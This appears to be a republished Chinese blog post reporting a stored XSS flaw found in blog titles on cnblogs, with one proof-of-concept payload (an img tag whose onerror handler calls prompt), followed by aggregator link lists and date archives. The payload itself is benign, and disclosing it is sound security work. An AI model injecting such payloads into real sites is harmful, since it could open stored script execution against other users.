博客园XSS

其他 2019-06-24 22:31:38 阅读次数: 0

前言

无意间发现博客园标题的存储型XSS。

不过仔细想想，既然都申请了JS权限，想做啥其实都可以。

Payload

<img src=x onerror="prompt('had3s')">

效果

猜你喜欢

转载自www.cnblogs.com/17bdw/p/11079850.html

博客园XSS

博客园url跳转导致xss

博客、博客园

博客园博客

项目-博客园

博客园

落户博客园

重回博客园

博客园美化

告别博客园

做客博客园

博客园配置

博客园——图

Hello,博客园!

博客园，您好

我的博客园

博客园css

美化博客园

回归博客园

linux博客园

博客园目录

博客园主题

加入博客园！

博客园订阅

转战博客园了。

博客园首发

博客园HelloWorld

使用博客园

博客园（新人）

博客园换肤

今日推荐

周排行

AIZU 2224 Save your cats(并查集)

HTTP响应头状态码详解

Python socket编程（2）

MaxCompute Studio使用心得系列7—作业对比

Supervisor安装使用

LeetCode 164. Maximum Gap

mysql面试题: 一张表里面有ID自增主键，当insert了17条记录之后，删除了第15,16,17条记录，再把mysql重启，再insert一条记录，这条记录的ID是18还是15

nutch1.2 DeleteDuplicates IndexMerger 详解

OC - @property与setter,getter方法

SpringBoot @Transactional的rollbackFor属性

每日归档

2024-09-19(0)

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)